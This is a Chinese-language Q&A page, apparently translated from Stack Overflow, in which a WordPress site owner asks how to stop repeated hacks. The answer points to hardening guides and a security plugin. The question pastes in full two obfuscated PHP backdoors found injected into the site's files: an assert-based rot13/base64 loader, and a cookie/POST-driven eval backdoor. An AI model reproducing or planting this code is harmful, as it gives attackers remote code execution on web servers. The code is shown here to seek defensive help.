Wordpress上的恶意代码 - 我已经清理

时间:2015-11-30 07:38:17

标签: php wordpress security

我已经在stackoverflow /信息安全方面阅读了很多相关问题。但我没有找到阻止添加代码的解决方案。

我在这里知道保护Wordpress网站的方式(如果有的话)

我在wordpress上运行的网站很少。最近其中一人遭到多次黑客入侵。我发现恶意代码添加到不同目录中的不同文件中。我不知道是不是因为文件权限?主要是文件名为indexfooter的文件。

在阅读其他答案后,我已经从所有文件中删除了该恶意代码,我还没有安装任何插件,我正在定期进行备份。

有关参考,以下是添加到文件中的代码:

//###==###
error_reporting(0); 
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUgcMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFyxnJHbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXGgcMvtunKAmMKDbWTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy0cXKgcMvujpzIaK21uqTAbXPVuYvS1VvkznJkyK2qyqS9wo250MJ50pltxK1ASHyMSHyfvH0AFFIOHK0MWGRIBDH1SVy0cXFy7WTZjCFWIIRLgBPV7sJIfp2I7WTZjCFW3nJ5xo3qmYGRlAGRvB319MJkmMKfxLmN9WTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy07sJyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcrlEwZG1wqKWfK2yhnKDbVzu0qUN6Yl82ZQN5BGxhpaHiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv4xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwHjBGRkLzVjAwL3MQp5BQL1BTZkZTLmZ2D4ZJV4Z2Z5Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB2A1pzksp2I0o3O0XPEwZFj0ZvkzLJkmMFx7L3IloS9mMKEipUDbWTZkYQR5BGRmYUElqJHcBlEcLaLtCFNtL3IloS9yrTIwXPEwZFx7L3IloS9woT9mMFtxLmRcB31yoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvx9CGRcrlEcLaLtCFOznJkyK2qyqS9wo250MJ50pltvnUE0pQbiYmLjZQx5BF5lqF9aMKDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYvEwZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvAGN5ZGSvLwN2AwqxAmx4AwH4LmRjMwZmMQtkLwtmLmxvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7sFOcMvNbnKAmMKDbWTyvqvxcVUftMJAbolNxnJW2BlO9VTyzXTymp2I0XPEsHxIEIHIGISfvpPWqXFNzWvNxK1WSHIISH1EoVaNvKFN9CFNvMQZ1MJDjBGpvXFO7VROup3AypaDbWS9FEISIEIAHJlWwVy0cBlO9sD=="));'));
//###==###  

有时代码如下所示:

<?php
$GLOBALS['b1d5c46e6'];global$b1d5c46e6;$b1d5c46e6=$GLOBALS;$b1d5c46e6['i249d']="\x59\x32\x45\x3a\x6d\x2c\x5d\x6e\x68\x42\x7e\x5c\x30\x5f\x29\x78\x58\x5e\x57\x25\x4e\x67\x35\x24\x50\x22\x3f\x21\x33\x3d\x3b\x20\x28\x44\x64\x7a\x5a\x6f\x48\x46\x4d\x38\xd\x9\x6c\x51\x53\x76\x37\x4f\x47\x34\x43\x52\x3c\x63\x69\x2b\x41\x70\x72\x2d\x6b\x60\x23\x40\x65\x54\x66\x2a\x73\x71\x39\x4a\x56\x62\x26\x4b\x27\x36\x79\x74\x2f\x7c\x31\x5b\x77\x49\x55\x3e\x2e\x6a\x75\x4c\x7d\x61\xa\x7b";$b1d5c46e6[$b1d5c46e6['i249d'][68].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][41]]=$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][8].$b1d5c46e6['i249d'][60];$b1d5c46e6[$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][84]]=$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][34];$b1d5c46e6[$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][28]]=$b1d5c46e6['i249d'][70].$b1d5c46e6['i249d'][81].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][44].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][7];$b1d5c46e6[$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][34]]=$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][7].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][13].$b1d5c46e6['i249d'][70].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][81];$b1d5c46e6[$b1d5c46e6['i249d'][7].$b1d5c46e6['i249d'][79].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][22].$b1d5c46e6['i249d'][12]]=$b1d5c46e6['i249d'][70].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][44].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][35].$b1d5c46e6['i249d'][66];$b1d5c46e6[$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][75]]=$b1d5c46e6['i249d'][59].$b1d5c46e6['i249d'][8].$b1d5c46e6['i249d'][59].$b1d5c46e6['i249d'][47].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][70].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][7];$b1d5c46e6[$b1d5c46e6['i249d'][47].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][12]]=$b1d5c46e6['i249d'][92].$b1d5c46e6['i249d'][7].$b1d5c46e6['i249d'][70].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][44].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][35].$b1d5c46e6['i249d'][66];$b1d5c46e6[$b1d5c46e6['i249d'][92].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][51]]=$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][70].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][79].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][13].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][66];$b1d5c46e6[$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][68].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][79].$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][95]]=$b1d5c46e6['i249d'][70].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][81].$b1d5c46e6['i249d'][13].$b1d5c46e6['i249d'][81].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][4].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][13].$b1d5c46e6['i249d'][44].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][4].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][81];$b1d5c46e6[$b1d5c46e6['i249d'][21].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][79].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][1]]=$b1d5c46e6['i249d'][92].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][48].$b1d5c46e6['i249d'][68].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][48];$b1d5c46e6[$b1d5c46e6['i249d'][47].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][34]]=$b1d5c46e6['i249d'][47].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][48].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][22].$b1d5c46e6['i249d'][79].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][48];$b1d5c46e6[$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][48].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][72]]=$_POST;$b1d5c46e6[$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][48].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][34]]=$_COOKIE;@$b1d5c46e6[$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][34]]($b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][13].$b1d5c46e6['i249d'][44].$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][21],NULL);@$b1d5c46e6[$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][34]]($b1d5c46e6['i249d'][44].$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][21].$b1d5c46e6['i249d'][13].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][70],0);@$b1d5c46e6[$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][34]]($b1d5c46e6['i249d'][4].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][15].$b1d5c46e6['i249d'][13].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][15].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][92].$b1d5c46e6['i249d'][81].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][7].$b1d5c46e6['i249d'][13].$b1d5c46e6['i249d'][81].$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][4].$b1d5c46e6['i249d'][66],0);@$b1d5c46e6[$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][68].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][79].$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][95]](0);$x889a21a=NULL;$sdd7d=NULL;$b1d5c46e6[$b1d5c46e6['i249d'][60].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][51]]=$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][48].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][61].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][61].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][48].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][61].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][61].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][48].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][66].$b1d5c46e6['i249d'][22].$b1d5c46e6['i249d'][22];global$r2a4;function v87095637($x889a21a,$pd5eda0){global$b1d5c46e6;$pd96="";for($z4e5=0;$z4e5<$b1d5c46e6[$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][28]]($x889a21a);){for($s08f4=0;$s08f4<$b1d5c46e6[$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][28]]($pd5eda0)&&$z4e5<$b1d5c46e6[$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][28]]($x889a21a);$s08f4++,$z4e5++){$pd96.=$b1d5c46e6[$b1d5c46e6['i249d'][68].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][41]]($b1d5c46e6[$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][84]]($x889a21a[$z4e5])^$b1d5c46e6[$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][84]]($pd5eda0[$s08f4]));}}return$pd96;}function u07f0d7($x889a21a,$pd5eda0){global$b1d5c46e6;global$r2a4;return$b1d5c46e6[$b1d5c46e6['i249d'][47].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][34]]($b1d5c46e6[$b1d5c46e6['i249d'][47].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][34]]($x889a21a,$r2a4),$pd5eda0);}foreach($b1d5c46e6[$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][48].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][34]]as$pd5eda0=>$laaf){$x889a21a=$laaf;$sdd7d=$pd5eda0;}if(!$x889a21a){foreach($b1d5c46e6[$b1d5c46e6['i249d'][37].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][48].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][72]]as$pd5eda0=>$laaf){$x889a21a=$laaf;$sdd7d=$pd5eda0;}}$x889a21a=@$b1d5c46e6[$b1d5c46e6['i249d'][47].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][1].$b1d5c46e6['i249d'][12]]($b1d5c46e6[$b1d5c46e6['i249d'][21].$b1d5c46e6['i249d'][41].$b1d5c46e6['i249d'][79].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][1]]($b1d5c46e6[$b1d5c46e6['i249d'][92].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][55].$b1d5c46e6['i249d'][51]]($x889a21a),$sdd7d));if(isset($x889a21a[$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][62]])&&$r2a4==$x889a21a[$b1d5c46e6['i249d'][95].$b1d5c46e6['i249d'][62]]){if($x889a21a[$b1d5c46e6['i249d'][95]]==$b1d5c46e6['i249d'][56]){$z4e5=Array($b1d5c46e6['i249d'][59].$b1d5c46e6['i249d'][47]=>@$b1d5c46e6[$b1d5c46e6['i249d'][56].$b1d5c46e6['i249d'][75].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][75]](),$b1d5c46e6['i249d'][70].$b1d5c46e6['i249d'][47]=>$b1d5c46e6['i249d'][84].$b1d5c46e6['i249d'][90].$b1d5c46e6['i249d'][12].$b1d5c46e6['i249d'][61].$b1d5c46e6['i249d'][84],);echo@$b1d5c46e6[$b1d5c46e6['i249d'][7].$b1d5c46e6['i249d'][79].$b1d5c46e6['i249d'][34].$b1d5c46e6['i249d'][28].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][51].$b1d5c46e6['i249d'][72].$b1d5c46e6['i249d'][22].$b1d5c46e6['i249d'][12]]($z4e5);}elseif($x889a21a[$b1d5c46e6['i249d'][95]]==$b1d5c46e6['i249d'][66]){eval($x889a21a[$b1d5c46e6['i249d'][34]]);}exit();}
?>

是否有任何安全插件或其他阻止添加此代码的内容?

非常感谢您的帮助。

1 个答案:

答案 0 :(得分:2)

你必须做WordPress强化以获得更多安全性。 强化步骤禁止在所有文件中添加内容,并禁用所有文件中的写入权限。

有关WordPress强化访问的详细信息,请访问以下链接 1) http://codex.wordpress.org/Hardening_WordPress
2) http://www.firedaemon.com/blog/wordpress-hardening-guide

在.htaccess文件中,有一个插件遵循所有强化步骤和添加禁用或禁止写入权限。

插件名称:All In One WP Security&amp;防火墙
插件链接: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/